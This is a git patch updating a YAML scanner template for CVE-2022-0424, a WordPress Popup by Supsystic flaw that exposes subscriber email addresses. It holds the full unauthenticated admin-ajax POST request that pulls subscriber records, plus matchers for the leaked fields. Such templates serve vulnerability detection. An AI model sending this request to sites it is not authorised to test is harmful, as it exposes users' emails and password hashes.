From 97864a8e5fe59038986f237d23cc6dc2a021f550 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 11 Apr 2024 10:10:31 +0530
Subject: [PATCH] updated matchers, info & req type

---
 http/cves/2022/CVE-2022-0424.yaml | 43 +++++++++++++++++--------------
 1 file changed, 23 insertions(+), 20 deletions(-)

diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml
index 8c62498717..5a972b442e 100644
--- a/http/cves/2022/CVE-2022-0424.yaml
+++ b/http/cves/2022/CVE-2022-0424.yaml
@@ -1,13 +1,14 @@
 id: CVE-2022-0424
+
 info:
-  name: Popup by Supsystic < 1.10.9 - Unauthenticated Subscriber Email Addresses Disclosure
+  name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
   author: Kazgangap
   severity: medium
   description: |
     The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
     - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
@@ -17,32 +18,34 @@ info:
     epss-percentile: 0.34103
     cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
   metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/popup-by-supsystic"
     vendor: supsystic
     product: popup
     framework: wordpress
-  tags: wpscan
+  tags: cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/wp-admin/admin-ajax.php"
-    headers:
-      Content-Length: "104"
-      Accept: "application/json, text/javascript, */*; q=0.01"
-      X-Requested-With: "XMLHttpRequest"
-      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
-      Accept-Encoding: "gzip, deflate"
-      Accept-Language: "en-US,en;q=0.9"
-      Connection: "close"
-    body: |
-      page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10
+
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '"id":"1","username"'
-          - 'email'
-          - 'hash'
+          - '"id":"'
+          - 'username":"'
+          - 'email":'
+          - 'hash":"'
+          - '_wpnonce'
+        condition: and
+
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200